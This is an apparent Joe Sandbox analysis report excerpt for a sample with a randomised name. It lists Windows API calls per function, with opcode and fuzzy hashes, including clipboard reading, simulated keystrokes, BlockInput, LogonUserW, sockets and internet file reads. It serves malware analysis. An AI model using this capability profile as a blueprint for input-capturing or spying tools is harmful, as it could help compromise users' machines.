                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: KeyboardMessagePostState$InputSend
                                          • String ID:
                                          • API String ID: 3031425849-0
                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                          APIs
                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLastinet_addrsocket
                                          • String ID:
                                          • API String ID: 4170576061-0
                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                          APIs
                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                          • IsWindowVisible.USER32 ref: 0047A368
                                          • IsWindowEnabled.USER32 ref: 0047A378
                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                          • IsIconic.USER32 ref: 0047A393
                                          • IsZoomed.USER32 ref: 0047A3A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                          APIs
                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                          • CoUninitialize.OLE32 ref: 0047863C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                          APIs
                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                          • CloseClipboard.USER32 ref: 0046DD0D
                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                          • CloseClipboard.USER32 ref: 0046DD41
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                          • CloseClipboard.USER32 ref: 0046DD99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                          • String ID:
                                          • API String ID: 15083398-0
                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: U$\
                                          • API String ID: 4104443479-100911408
                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                          • String ID:
                                          • API String ID: 901099227-0
                                          • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                          • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                          APIs
                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Proc
                                          • String ID:
                                          • API String ID: 2346855178-0
                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                          APIs
                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N@
                                          • API String ID: 0-1509896676
                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
